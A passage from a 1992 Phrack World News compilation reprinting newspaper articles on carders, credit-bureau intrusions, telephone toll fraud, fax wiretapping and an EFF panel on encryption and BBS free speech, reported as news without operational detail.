|
|
charges."
|
|
|
|
Godwin, in his remarks, expressed concern that there is not sufficient
|
|
recognition of the uniqueness of BBS and conferencing systems and that,
|
|
therefore, legislators possibly will make decisions based on misunderstandings.
|
|
He said "Telephone conversations, with the exception of crude conference call
|
|
systems are 'one-to-one' communications. Newspapers and radio & telephone are
|
|
"one-to-many" systems but BBS" are "many-to-many" and this is different. EFF
|
|
is interested in seeing that First Amendment protection is understood as
|
|
applying to BBSs."
|
|
|
|
He continued "We also have a concern that law enforcement agencies will respond
|
|
to the challenges of new technology in inappropriate ways. The FBI and Justice
|
|
Department, through the 'Digital Telephony Initiative' have requested that the
|
|
phone companies such at AT&T and Sprint be required to provide law enforcement
|
|
with the a method of wire-tapping in spite of technological developments that
|
|
make present methods less effective.
|
|
|
|
"Such a procedure would, in effect, make the companies part of the surveillance
|
|
system and we don't think that that is their job. We think that it is up to
|
|
law enforcement to develop their own crime-fighting tools. When the telephone
|
|
was first developed it made it more difficult to catch crooks. They no longer
|
|
had to stand around together to plan foul deeds; they could do it by telephone.
|
|
Then the government discovered wiretapping and was able to respond.
|
|
|
|
"This ingenuity was shown again recently when law enforcement officials,
|
|
realizing that John Gotti knew that his phones were tapped and discussed
|
|
wrongdoings outdoors in front of his house, arranged to have the lampposts
|
|
under which Gotti stood tapped. That, in my judgement, is a reasonable
|
|
approach by law enforcement."
|
|
|
|
Godwin also spoke briefly concerning the on-going debate over encryption. "The
|
|
government, through varies agencies such as NSA, keeps attempting to restrict
|
|
citizens from cloaking their computer files or messages in seemingly
|
|
unbreakable coding. We think that people have rights to privacy and, should
|
|
they wish to protect it by encoding computer messages, have a perfect right to
|
|
do so."
|
|
|
|
Bruce Fancher, sysop and owner of the new New York commercial BBS service,
|
|
MindVox, and the last speaker in the program, recounted some of his experiences
|
|
as a "hacker" and asked the audience to understand that these individuals, even
|
|
if found attached to a computer system to which they should not legitimately
|
|
access, are not malicious terrorists but rather explorers. Fancher was a last
|
|
minute replaced for well-known NY hacker Phiber Optik who did not speak, on the
|
|
advice of his attorney, because he is presently the subject of a Justice
|
|
Department investigation.
|
|
|
|
During the question and answer period, Delaney suggested that a method of
|
|
resolving the encryption debate would be for third parties, such as banks and
|
|
insurance companies, to maintain the personal encryption key for those using
|
|
encryption. A law enforcement official would then have to obtain a judge's
|
|
ruling to examine or "tap" the key for future use to decipher the contents of
|
|
the file or message.
|
|
|
|
Godwin disagreed, saying that the third party would then become a symbol for
|
|
"crackers" and that he did not think it in the country's best interests to just
|
|
add another level of complexity to the problem.
|
|
|
|
The question and answer period lasted for about 45 minutes with the majority of
|
|
questions concerning encryption and the FBI wiretap proposal.
|
|
_______________________________________________________________________________
|
|
|
|
Couple Of Bumbling Kids April 24, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Alfred Lubrano (Newsday)
|
|
|
|
Two young Queens computer hackers, arrested for the electronic equivalent of
|
|
pickpocketing credit cards and going on a computer shopping spree, will be
|
|
facing relatively minor charges.
|
|
|
|
Rudolph Loil, age 17, of Woodside, charged with attempted grand larceny, was
|
|
released from police custody on a desk appearance ticket, a spokesman for the
|
|
Queens district attorney's office said.
|
|
|
|
A 15-year-old friend from Elmhurst who was also arrested was referred to Queens
|
|
Family Court, whose proceedings are closed, the spokesman said. He was not
|
|
identified because of his age.
|
|
|
|
Law-enforcement sources said they are investigating whether the two were
|
|
"gofers" for adults who may have engaged them in computer crime, or whether
|
|
they acted on their own.
|
|
|
|
But Secret Service officials, called into the matter, characterized the case as
|
|
"just a couple of bumbling kids" playing with their computer.
|
|
|
|
The youths were caught after allegedly ordering $1,043 in computer equipment
|
|
with a credit card number they had filched electronically from bank records,
|
|
officials said.
|
|
|
|
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
|
|
|
|
Hackers April 27, 1992
|
|
~~~~~~~
|
|
Taken from InformationWeek (Page 8)
|
|
|
|
Two teenagers were arrested last week in New York for using computers to steal
|
|
credit card and telephone account numbers and then charging thousands of
|
|
dollars worth of goods and phone calls to the burgled accounts.
|
|
|
|
The two were caught only after some equipment they had ordered was sent to the
|
|
home of the credit card holder whose account number had been pilfered. Their
|
|
arrests closely follow the discovery by the FBI of a nationwide ring of 1,000
|
|
computer criminals, who charge purchases and telephone calls to credit card and
|
|
phone account numbers stolen from the Equifax credit bureau and other sources.
|
|
|
|
The discovery has already led to the arrest of two Ohio hackers and the seizure
|
|
of computer equipment in three cities.
|
|
_______________________________________________________________________________
|
|
|
|
DOD Gets Fax Evesdroppers April 14, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Joseph Albright (Atlanta Journal and Constitution)(Page A12)
|
|
|
|
Washington -- The Air Force is buying a new weapon to battle leaks: A $30,000
|
|
portable fax-tapper.
|
|
|
|
Whenever someone transmits a fax, the fax-tapping device attached to the phone
|
|
line will sneak an electronic copy and store it in a laptop computer's memory.
|
|
Each of the new devices will enable an Air Force intelligence officer to
|
|
monitor four telephones for "communications security" violations.
|
|
|
|
Susan Hansen, a Defense Department spokeswoman, said last week that "there is
|
|
no plan right at the moment" to install the devices in the Pentagon, whose
|
|
top leaders have been outraged in recent weeks by leaks of classified policy
|
|
documents to reporters.
|
|
|
|
But she left open the possibility that some of them will be attached to
|
|
sensitive military fax lines when the tapping devices are delivered to the Air
|
|
Force six months to a year from now.
|
|
|
|
"There are a lot of things that are under review here," she said after
|
|
consulting with the Pentagon's telecommunications office.
|
|
|
|
Plans to buy 40 of the devices were disclosed a few weeks ago in a contract
|
|
notice from a procurement officer at Wright-Patterson Air Force Base near
|
|
Dayton, Ohio. When contacted, a spokesman referred inquiries to the Air
|
|
Force Intelligence Command at Kelly Air Force Base, Texas, which authorized the
|
|
purchase.
|
|
|
|
The Air Force Intelligence Command insisted that the devices will never be used
|
|
for law enforcement purposes or even "investigations."
|
|
|
|
"The equipment is to be used for monitoring purposes only, to evaluate the
|
|
security of Air Force official telecommunications," said spokesman Dominick
|
|
Cardonita. "The Air Force intelligence command does not investigate."
|
|
|
|
Mr. Cardonita said that, for decades, Air Force personnel in sensitive
|
|
installations have been on notice that their voice traffic on official lines is
|
|
subject to "communications security" monitoring. The fax-tapper simply
|
|
"enhances" the Air Force's ability to prevent "operational security"
|
|
violations, he said.
|
|
|
|
He estimated that the Air Force will pay $1.2 million under the contract, due
|
|
to be let this June. That averages out to $ 30,000 for each fax-tapper, but
|
|
Mr. Cardonita said the price includes maintenance and training.
|
|
|
|
Douglas Lang, president of Washington's High Technology Store and an authority
|
|
on security devices, said that, so far as he knows, the Air Force is the first
|
|
government agency to issue an order for fax-tapping machines.
|
|
|
|
Mr. Lang said he has heard from industry sources that 15 contractors have
|
|
offered to sell such devices to Wright-Patterson.
|
|
|
|
"It is one more invasion of privacy by Big Brother," declared Mr. Lang, who
|
|
predicted that the Air Force will use the devices mainly to catch anyone trying
|
|
to leak commercially valuable information to contractors.
|
|
|
|
Judging from the specifications, the Air Force wants a machine that can trace
|
|
leaks wherever they might occur.
|
|
|
|
Mr. Cardonita said the Air Force Intelligence Command will use the devices
|
|
only when invited onto an Air Force base by a top commander.
|
|
_______________________________________________________________________________
|
|
|
|
900-Number Fraud Case Expected to Set a Trend April 2, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By David Thompson (Omaha <Nebraska> World-Herald)
|
|
|
|
Civil court cases against abuses of 900-toll telephone number "will be slam
|
|
dunks" as the result of the successful prosecution of a criminal case in Omaha
|
|
over 900 numbers, a federal postal inspector said.
|
|
|
|
Postal inspector Michael Jones said numerous civil actions involving 900
|
|
numbers have been filed, including three recently in Iowa. At least one civil
|
|
case is pending in Nebraska, he said, and there may be others.
|
|
|
|
Jones said the mail fraud conviction of Bedford Direct Mail Service Inc. of
|
|
Omaha and its president, Ellis B. Goodman, 52, of 1111 South 113th. Court, may
|
|
have been the first criminal conviction involving 900 numbers.
|
|
|
|
The conviction also figures in Nebraska Attorney General Don Stenberg's
|
|
consumer protection program, which calls attention to abuses of 900 numbers, a
|
|
staff member said.
|
|
|
|
Among consumer complaints set to Stenberg's office, those about 900 numbers
|
|
rank in the top five categories, said Daniel L. Parsons, senior consumer
|
|
protection specialist.
|
|
|
|
People are often lured by an offer of a gift or prize to dial a toll-free 800
|
|
number, then steered to a series of 900 numbers and charged for each one,
|
|
Parsons said.
|
|
|
|
He said that during the last two years, state attorneys general have taken
|
|
action against 150 organizations for allegedly abusing 900 numbers.
|
|
_______________________________________________________________________________
|
|
|
|
|
|
|
|
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume Four, Issue Thirty-Nine, File 11 of 13
|
|
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
PWN PWN
|
|
PWN Phrack World News PWN
|
|
PWN PWN
|
|
PWN Issue XXXIX / Part Two of Four PWN
|
|
PWN PWN
|
|
PWN Compiled by Datastream Cowboy PWN
|
|
PWN PWN
|
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|
|
|
|
|
The Charge Of The Carders May 26, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Joshua Quittner (<New York> Newsday)(Page 45)
|
|
|
|
Computer criminals are after your credit-card numbers --
|
|
to steal with, sell and swap.
|
|
|
|
THE KID, from Springfield Gardens, Queens, was a carder, of course.
|
|
|
|
He was doing what carders do: trying to talk a salesman into overnight-
|
|
expressing him a $4,000 computer system -- and using a stolen credit-card
|
|
number for payment.
|
|
|
|
The salesman was playing right along on the phone; he had also notified a co-
|
|
worker to alert the New York State Police, said William Murphy, a customer
|
|
service manager at Creative Computers, who described the event as it was
|
|
unfolding on a recent Tuesday morning. Murphy said that on a typical day, as
|
|
many as a dozen times, carders would call and try to buy everything from modems
|
|
to whole computer systems.
|
|
|
|
Murphy said that these days, the security people at Creative Computers are able
|
|
to stop virtually all of them, either by not delivering the goods, or by
|
|
delivering them UPS -- that's United Police Service.
|
|
|
|
He sighed: "It's amazing that they even try."
|
|
|
|
But try they do. And at other places, they're successful. Where once hacking
|
|
into a credit bureau was a kind of rite of passage for computer intruders, who
|
|
generally did little more than look up credit histories on people like Mike
|
|
Dukakis, now computer criminals are mining national credit bureaus and mail-
|
|
order houses, coming away with credit-card numbers to sell, swap or use for
|
|
mail-order purchases.
|
|
|
|
Underground electronic bulletin board systems help spread not only the
|
|
passwords, but the techniques used to tap into different systems. In
|
|
San Diego on April 30, for instance, police raided a bulletin board called
|
|
Scantronics, which offered among other things, step-by-step manuals on how to
|
|
hack into Equifax Credit Information Services and TRW Information Services, the
|
|
largest credit bureaus in the nation, the San Diego Tribune reported.
|
|
|
|
"The potential for fraud is enormous, it's almost limitless," said Joel Lisker,
|
|
Mastercard International's vice president of security and risk management, who
|
|
noted that computer intruders accessed "thousands" of credit-card account
|
|
numbers in another recent case.
|
|
|
|
MASTERCARD is putting together a task force of its bank members to address the
|
|
problem, and is considering inviting hackers in to learn what they can do to
|
|
tighten up computer access to credit bureaus, he said.
|
|
|
|
Mastercard estimates it lost $57 million to counterfeit scams last year; Lisker
|
|
said it is impossible to say how much carders contributed. But based on the
|
|
volume of arrests lately, he figures carding has become a big problem.
|
|
|
|
"It's kind of like a farmer that sees a rat," Lisker said. "If he sees one, he
|
|
knows he has several. And if he sees several he knows he has a major
|
|
infestation. This is a major infestation."
|
|
|
|
"It's clearly something we should be concerned about," agreed Scott Charney,
|
|
chief of the U.S. Justice Department's new Computer Crime Unit. Charney said
|
|
that roughly 20 percent of the unit's current caseload involves credit-card
|
|
fraud, a number that, if nothing else, colors the notion that all hackers are
|
|
misunderstood kids, innocently exploring the world of computer networks.
|
|
|
|
"Whether such noble hackers exist, the fact of the matter is we're seeing
|
|
people out there whose motives are not that pure," he said.
|
|
|
|
On May 11, New York State Police arrested three teenagers in Springfield
|
|
Gardens when one of them went to pick up what he hoped was an Amiga 3000
|
|
computer system from Creative Computers, at a local UPS depot.
|
|
|
|
"What he wanted was a computer, monitor and modem. What he got was arrested,"
|
|
said John Kearey, a state police investigator who frequently handles computer
|
|
and telecommunications crimes. Police posed as UPS personnel and arrested the
|
|
youth, who led them to his accomplices.
|
|
|
|
Kearey said the teens said they got the stolen credit-card number from a
|
|
"hacker who they met on a bridge, they couldn't remember his name" -- an
|
|
interesting coincidence because the account number was for a next-door neighbor
|
|
of one of the youths. Police suspect that the teens, who claimed to belong to
|
|
a small hacking group called the MOB (for Men of Business) either hacked into a
|
|
credit bureau for the number, got someone else to do it, or went the low-tech
|
|
route -- "dumpster diving" for used carbon copies of credit receipts.
|
|
|
|
Indeed, most credit-card fraud has nothing to do with computer abusers.
|
|
Boiler-room operations, in which fast-talking con men get cardholders to
|
|
divulge their account numbers and expiration dates in exchange for the promise
|
|
of greatly discounted vacations or other too-good-to-be-true deals, are far and
|
|
away the most common scams, said Gregory Holmes, a spokesman for Visa.
|
|
|
|
But carders have an advantage over traditional credit-card cheats: By using
|
|
their PCs to invade credit bureaus, they can find credit-card numbers for
|
|
virtually anyone. This is useful to carders who pick specific credit-card
|
|
numbers based on location -- a neighbor is out of town for a week, which means
|
|
all you have to do is get his account number, stake out his porch and sign for
|
|
the package when the mail comes. Another advantage is address and ZIP code
|
|
verifications, once a routine way of double-checking a card's validity, are no
|
|
longer useful because carders can get that information from an account record.
|
|
|
|
"It's tough," Holmes said. "Where it becomes a major problem is following the
|
|
activity of actually getting the credit-card number; it's sent out on the black
|
|
market to a vast group of people" generally over bulletin boards. From there,
|
|
a large number of purchases can be racked up in a short period of time, well
|
|
before the cardholder is aware of the situation. While the cardholder is not
|
|
liable, the victims usually are businesses like Creative Computers, or the
|
|
credit-card company.
|
|
|
|
Murphy said his company used to get burned, although he would not divulge the
|
|
extent of its losses. "It happened until we got wise enough to their ways," he
|
|
said.
|
|
|
|
Now, with arrangements among various law enforcement agencies, telephone
|
|
companies and mail carriers, as well as a combination of call-tracing routines
|
|
and other verification methods, carders "rarely" succeed, he said. Also, a
|
|
dozen employees work on credit-card verification now, he said. "I feel sorry
|
|
for the companies that don't have the resources to devote departments to filter
|
|
these out. They're the ones that are getting hit hard."
|
|
|
|
In New York, federal, state and local police have been actively investigating
|
|
carder cases. Computers were seized and search warrants served on a number of
|
|
locations in December, as part of an ongoing federal investigation into
|
|
carding. City police arrested two youths in Queens in April after attempting
|
|
to card a $1,500 computer system from Creative Computers. They were arrested
|
|
when they tried to accept delivery.
|
|
|
|
"It's a legitimate way to make money. I know people who say they do it,"
|
|
claimed a 16-year-old Long Island hacker who uses the name JJ Flash.
|
|
|
|
While he says he eschews carding in favor of more traditional, non-malicious
|
|
hacking, JJ Flash said using a computer to break into a credit bureau is as
|
|
easy as following a recipe. He gave a keystroke-by-keystroke description of
|
|
how it's done, a fairly simple routine that involved disguising the carder's
|
|
calling location by looping through a series of packet networks and a Canadian
|
|
bank's data network, before accessing the credit bureau computer. Once
|
|
connected to the credit bureau computer, JJ Flash said a password was needed --
|
|
no problem, if you know what underground bulletin boards to check.
|
|
|
|
"It's really easy to do. I learned to do it in about thirty seconds. If you
|
|
put enough time and energy into protecting yourself, you'll never get caught,"
|
|
he said. For instance, an expert carder knows how to check his own phone line
|
|
to see if the telephone company is monitoring it, he claimed. By changing the
|
|
location of a delivery at the last minute, he said carders have evaded capture.
|
|
|
|
J J FLASH said that while most carders buy computers and equipment for
|
|
themselves, many buy televisions, videocassette recorders and other goods that
|
|
are easy to sell. "You can usually line up a buyer before its done," he said.
|
|
"If you have a $600 TV and you're selling it for $200, you will find a buyer."
|
|
|
|
He said that while TRW has tightened up security during the past year, Equifax
|
|
was still an easy target.
|
|
|
|
But John Ford, an Equifax spokesman, said he believes that hackers greatly
|
|
exaggerate their exploits. He said that in the recent San Diego case, only 12
|
|
records were accessed. "It seems to me the notion that anybody who has a PC
|
|
and a modem can sit down and break in to a system is patently untrue," he said.
|
|
"We don't have any evidence that suggests this is a frequent daily occurrence."
|
|
|
|
Regardless, Ford said his company is taking additional steps to minimize the
|
|
risk of intrusion. "If one is successful in breaking into the system, then we
|
|
are instituting some procedures that would render the information that the
|
|
hacker receives virtually useless."
|
|
|
|
Also, by frequently altering customers' passwords, truncating account
|
|
information so that entire credit-card numbers were not displayed, and possibly
|
|
encrypting other information, the system will become more secure.
|
|
|
|
"We take very seriously our responsibility to be the stewards of consumer
|
|
information," Ford said.
|
|
|
|
But others say that the credit bureaus aren't doing enough. Craig Neidorf,
|
|
publisher of Phrack, an underground electronic publication "geared to computer
|
|
and telecommunications enthusiasts," said that hacking into credit bureaus has
|
|
been going on, and has been easy to do "as long as I've been around." Neidorf
|
|
said that although he doesn't do it, associates tell him that hacking into
|
|
credit bureau's is "child's play" -- something the credit bureaus have been
|
|
careless about.
|
|
|
|
"For them not to take some basic security steps to my mind makes them
|
|
negligent," Neidorf said. "Sure you can go ahead and have the kids arrested
|
|
and yell at them, but why isn't Equifax or any of the other credit bureaus not
|
|
stopping the crime from happening in the first place? It's obvious to me that
|
|
whatever they're doing probably isn't enough."
|
|
|
|
A Recent History Of Carding
|
|
|
|
September 6, 1991: An 18-year-old American emigre, living in Israel, was
|
|
arrested there for entering military, bank and credit bureau computers. Police
|
|
said he distributed credit-card numbers to hackers in Canada and the United
|
|
States who used them to make unknown amounts of cash withdrawals.
|
|
|
|
January 13, 1992: Four university students in San Luis Obispo, California,
|
|
were arrested after charging $250,000 in merchandise to Mastercard and Visa
|
|
accounts. The computer intruders got access to some 1,600 credit-card
|
|
accounts, and used the numbers to buy, among other things: Four pairs of $130
|
|
sneakers; a $3,500 stereo; two gas barbecues and a $3,000 day at Disneyland.
|
|
|
|
February 13, 1992: Two teenagers were arrested when one of them went to pick
|
|
up two computer systems in Bellevue, Wash., using stolen credit-card numbers.
|
|
One told police that another associate had hacked into the computer system of a
|
|
mail-order house and circulated a list of 14,000 credit-card numbers through a
|
|
bulletin board.
|
|
|
|
April 17, 1992: Acting on a tip from San Diego police, two teenagers in Ohio
|
|
were arrested in connection with an investigation into a nationwide computer
|
|
hacking scheme involving credit-card fraud. Police allege "as many as a
|
|
thousand hackers" have been sharing information for four years on how to use
|
|
their computers to tap into credit bureau databases. Equifax, a credit bureau
|
|
that was penetrated, admits that a dozen records were accessed.
|
|
|
|
April 22, 1992: Two Queens teens were arrested for carding computer equipment.
|
|
_______________________________________________________________________________
|
|
|
|
Invading Your Privacy May 24, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~
|
|
By Rob Johnson (The Atlanta Journal and Constitution)(Page A9)
|
|
|
|
Some do it for fun, others have more criminal intent. Regardless, computer
|
|
users have a range of techniques and weaponry when breaking into files.
|
|
"Rooting" forbidden files is hog heaven for hackers
|
|
|
|
Within an instant, he was in.
|
|
|
|
Voodoo Child, a 20-year-old college student with a stylish haircut and a well-
|
|
worn computer, had been cruising a massive researchers' network called Internet
|
|
when he stumbled upon a member account he hadn't explored for a while.
|
|
|
|
The institution performed "Star Wars" research, he later found out, but that
|
|
didn't interest him. "I don't know or care anything about physics," he said
|
|
recently. "I just wanted to get root."
|
|
|
|
And "getting root," hackers say, means accessing the very soul of a computer
|
|
system.
|
|
|
|
Working through the network, he started a program within the research
|
|
institute's computers, hoping to interrupt it at the right moment. "I figured
|
|
I just had a second," he said, gesturing with fingers arched above an imaginary
|
|
keyboard. Suddenly he pounced on the phantom keys. "And it worked."
|
|
|
|
He soon convinced the computer he was a system operator, and he built himself a
|
|
back door to Internet: He had private access to exotic supercomputers and
|
|
operating systems around the world.
|
|
|
|
Before long, though, the Atlanta-area hacker was caught, foiled by an MCI
|
|
investigator following his exploits over the long-distance phone lines.
|
|
National security experts sweated over a possible breach of top-secret
|
|
research; the investigation is continuing.
|
|
|
|
And Voodoo Child lost his computer to law enforcement.
|
|
|
|
"I was spending so much time on the computer, I failed out of college," he
|
|
said. "I would hack all night in my room, go to bed and get up at 4 in the
|
|
afternoon and start all over."
|
|
|
|
In college, he and a friend were once discovered by campus police dumpster-
|
|
diving behind the university computer building, searching for any scraps of
|
|
paper that might divulge an account number or a password that might help them
|
|
crack a computer.
|
|
|
|
Now he's sweating it out while waiting for federal agents to review his case.
|
|
"I'm cooperating fully," he said. "I don't want to go to prison. I'll do
|
|
whatever they want me to."
|
|
|
|
In the meantime, he's back in college and has taken up some art projects he'd
|
|
abandoned for the thrill of computer hacking.
|
|
|
|
The free-form days of computer hacking have definitely soured a bit -- even for
|
|
those who haven't been caught by the law.
|
|
|
|
"It's a lot more vicious," Voodoo Child said as a friend nodded in agreement.
|
|
"Card kids" -- young hackers who ferret out strangers' credit card numbers and
|
|
calling card accounts -- are wrecking the loose communal ethic that defined
|
|
hacking's earlier, friendlier days.
|
|
|
|
And other computer network users, he said, are terrified of the tactics of
|
|
sophisticated hackers who routinely attack other computer users' intelligence,
|
|
reputation and data.
|
|
|
|
"I used to run a BBS [electronic bulletin board system] for people who wanted
|
|
to learn about hacking," Voodoo Child said. "But I never posted anything
|
|
illegal. It was just for people who had questions, who wanted to do it
|
|
properly."
|
|
|
|
Doing it properly, several Atlanta-area hackers say, means exploring the gaps
|
|
in computer networks and corporate systems. They say it's an intellectual
|
|
exercise -- and an outright thrill -- to sneak into someone else's computer.
|
|
|
|
During a recent interview, Voodoo Child and a friend with a valid Internet
|
|
account dialed up the giant network, where some of their counterparts were
|
|
waiting for a reporter to ask them some questions.
|
|
|
|
"Did you get that information on the Atlanta Constitution reporter you were
|
|
asking about?" a faceless stranger asked.
|
|
|
|
A startled reporter saw his credit report and credit card numbers flashed
|
|
across the screen. Voodoo Child offered up the keyboard -- an introduction of
|
|
sorts to a mysterious, intimidating accomplice from deep inside the digital
|
|
otherworld. "Go ahead," he said. "Ask him anything you want."
|
|
_______________________________________________________________________________
|
|
|
|
KV4FZ: Guilty Of Telephone Toll Fraud May 15, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By John Rice (rice@ttd.teradyne.com) in TELECOM Digest V12 #412
|
|
|
|
St. Croix ham operator, Herbert L. "Herb" Schoenbohm, KV4FZ, has been found
|
|
guilty in federal court of knowingly defrauding a Virgin Islands long-distance
|
|
telephone service reseller. He was convicted April 24th of possessing and
|
|
using up to fifteen unauthorized telephone access devices in interstate and
|
|
foreign commerce nearly five years ago.
|
|
|
|
The stolen long distance telephone access codes belonged to the Caribbean
|
|
Automated Long Lines Service, Inc. (CALLS) of St. Thomas, U.S. Virgin Islands.
|
|
Schoenbohm was found to have made more than $1,000 in unauthorized telephone
|
|
calls -- although the prosecution said he was responsible for far more.
|
|
|
|
According to the Virgin Islands Daily News, Schoenbohm, who is also the St.
|
|
Croix Police Chief of Communications, showed no emotion when he was pronounced
|
|
guilty of the charges by a 12 member jury in U.S District Court in
|
|
Christiansted. The case was heard by visiting District Judge Anne Thompson.
|
|
|
|
Neither Schoenbohm or his defense attorney, Julio Brady, would comment on the
|
|
verdict. The jury deliberated about seven hours. The sentencing, which has
|
|
been set for June 26, 1992, will be handled by another visiting judge not
|
|
familiar with the case.
|
|
|
|
Schoenbohm, who is Vice Chairman of the V.I. Republican Committee, has been
|
|
released pending sentencing although his bail was increased from $5,000 to
|
|
$25,000. While he could receive a maximum of ten years on each count,
|
|
Assistant U.S. Attorney Alphonse Andrews said Schoenbohm probably will spend no
|
|
more than eight months in prison since all three counts are similar and will be
|
|
merged.
|
|
|
|
Much of the evidence on the four day trial involved people who received
|
|
unauthorized telephone calls from KV4FZ during a 1987 period recorded by the
|
|
CALLS computer. Since the incident took place more than five years ago, many
|
|
could not pinpoint the exact date of the telephone calls.
|
|
|
|
The prosecution produced 20 witnesses from various U.S locations, including
|
|
agents from the Secret Service, the U.S. Marshals Service, Treasury Department
|
|
and Federal Communications Commission. In addition ham operators testified for
|
|
the prosecution.
|
|
|
|
Schoenbohm was portrayed as a criminal who had defrauded calls out of hundreds
|
|
of thousands of dollars. Schoenbohm admitted using the service as a paying
|
|
customer, said it did not work and that he terminated the service and never
|
|
used it again. He feels that there was much political pressure to get him
|
|
tried and convicted since he had been writing unfavorably articles about
|
|
Representative DeLugo, a non-voting delegate to Congress from the Virgin
|
|
Islands, including his writing of 106 bad checks during the recent rubbergate
|
|
scandal.
|
|
|
|
Most, but not all the ham operators in attendance were totally opposed to
|
|
KV4FZ. Bob Sherrin, W4ASX from Miami attended the trial as a defense character
|
|
witness. Sherrin told us that he felt the conviction would be overturned on
|
|
appeal and that Schoenbohm got a raw deal. "They actually only proved that he
|
|
made $50 in unauthorized calls but the jury was made to believe it was $1,000."
|
|
|
|
Schoenbohm's attorney asked for a continuance due to newly discovered evidence,
|
|
but that was denied. There also is a question as to whether the jury could
|
|
even understand the technology involved. "Even his own lawyer couldn't
|
|
understand it, and prepared an inept case," Sherrin said. "I think he was
|
|
railroaded. They were out to get him. There were a lot of ham net members
|
|
there and they were all anti-Herb Schoenbohm. The only people that appeared
|
|
normal and neutral were the FCC. The trial probably cost them a million
|
|
dollars. All his enemies joined to bring home this verdict."
|
|
|
|
Schoenbohm had been suspended with pay from the police department job since
|
|
being indicted by the St. Croix grand jury. His status will be changed to
|
|
suspension without pay if there is an appeal. Termination will be automatic if
|
|
the conviction is upheld. Schoenbohm's wife was recently laid off from her job
|
|
at Pan Am when the airline closed down. Financially, it could be very
|
|
difficult for KV4FZ to organize an appeal with no money coming in.
|
|
|
|
The day after the KV4FZ conviction, Schoenbohm who is the Republican Committee
|
|
vice chairman was strangely named at a territorial convention as one of eight
|
|
delegates to attend the GOP national convention in Houston this August. He was
|
|
nominated at the caucus even though his felony conviction was known to
|
|
everyone. Schoenbohm had even withdrawn his name from consideration since he
|
|
was now a convicted felon.
|
|
|
|
The Virgin Island Daily News later reported that Schoenbohm will not be
|
|
attending the GOP national convention. "Schoenbohm said he came to the
|
|
conclusion that my remaining energies must be spent in putting my life back
|
|
together and doing what I can to restore my reputation. I also felt that any
|
|
publicity in association with my selection may be used by critics against the
|
|
positive efforts of the Virgin Islands delegation."
|
|
|
|
Schoenbohm has been very controversial and vocal on the ham bands. Some ham
|
|
operators now want his amateur radio license pulled -- and have made certain
|
|
that the Commission is very much aware of his conviction.
|
|
_______________________________________________________________________________
|
|
|
|
AT&T Launches Program To Combat Long-Distance Theft May 13, 1992
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
By Virginia Randall (United Press International/UPI)
|
|
|
|
Citing the mushrooming cost of long-distance telephone fraud, American
|
|
Telephone & Telegraph Co. announced plans to combat theft of long-distance
|
|
telephone services from customers.
|
|
|
|
AT&T's program, dubbed NetProtect, is an array of software, consulting,
|
|
customer education and monitoring services for businesses. One program limits
|
|
customer liability to the first $25,000 of theft, while another ends customer
|
|
liability entirely under certain circumstances.
|
|
|
|
By law, companies are liable for the cost of calls made on their systems,
|
|
authorized or not.
|
|
|
|
Jerre Stead, president of AT&T's Business Communications unit, said, "The
|
|
program not only offers financial relief to victims of long-distance fraud.
|
|
It also gives our customers new products and services specifically designed to
|
|
prevent and detect fraud."
|
|
|
|
Long-distance calling fraud ranges from a few dollars to the hundreds of
|
|
thousands of dollars for victims. The Communications Fraud Control
|
|
Association, an industry group, estimates long-distance calling fraud costs
|
|
more than $1 billion a year, said Peggy Snyder, an association spokeswoman.
|
|
|
|
NetProtect Basic Service, offered free with long-distance and domestic 800
|
|
service, consists of ongoing monitoring around the clock for unusual activity.
|
|
|
|
The company will start this service this week.
|
|
|
|
NetProtect Enhanced and Premium services offer more customized monitoring and
|
|
limit customer liability to $25,000 per incident or none at all, depending on
|
|
the program selected.
|
|
|
|
Pricing and permission to provide the Enhanced and Premium services are
|
|
dependent on Federal Communication Commission approval. AT&T expects to offer
|
|
these programs beginning August 1.
|
|
|
|
Other offerings are a $1,995 computer software package called "Hacker Tracker,"
|
|
consulting services and the AT&T Fraud Intervention Service, a swat team of
|
|
specialists who will detect and stop fraud while it is in progress.
|
|
|
|
The company also will provide a Security Audit Service that will consult with
|
|
customers on possible security risks. Pricing will be calculated on a case-by-
|
|
case basis, depending on complexity.
|
|
|
|
The least expensive option for customers is AT&T's Security Handbook and
|
|
Training, a self-paced publication available for $65 which trains users on
|
|
security features for AT&T's PBX, or private branch exchanges, and voice mail
|
|
systems.
|
|
|
|
Fraud occurs through PBX systems, which are used to direct the external
|
|
telephone calls of a business.
|
|
|
|
Company employees use access codes and passwords to gain entry to their PBX
|
|
system. A typical use, the industry fraud group's Snyder said, would be a
|
|
sales force on the road calling into their home offices for an open line to
|
|
call other customers nationally or worldwide.
|
|
|
|
These access codes can be stolen and used to send international calls through
|
|
the company's network, billable to the company.
|
|
|
|
Unauthorized access to PBXs occur when thieves use an automatic dialing feature
|
|
in home computers to dial hundreds of combinations of phone numbers until they
|
|
gain access to a company's PBX system.
|
|
|
|
These thieves, also known as hackers, phone freaks or phrackers, then make
|
|
their own calls through the PBX system or sell the number to a third party to
|
|
make calls.
|
|
|
|
Others use automatic dialing to break into PBX systems through voice mail
|
|
systems because such systems have remote access features.
|
|
|
|
Calls from cellular phones also are at risk if they are remotely accessed to a
|
|
PBX. Electronic mail systems for intracompany calls are not affected because
|
|
they don't require PBX systems.
|
|
|
|
According to Bob Neresian of AT&T, most fraud involves long-distance calls to
|
|
certain South American and Asian countries, especially Columbia and Pakistan.
|
|
|
|
There is no profile of a typical company at risk for telephone fraud, said
|
|
Snyder.
|
|
|
|
"Any company of any size with long-distance service is at risk," she said.
|
|
"Criminals don't care who the long distance provider is or how big the company
|
|
they're stealing from is."
|
|
|
|
She said the industry recognized the dimensions of telephone theft in 1985,
|
|
when the Communications Fraud Control Association was formed in Washington D.C.
|
|
The group consists of providers of long-distance service, operator services,
|
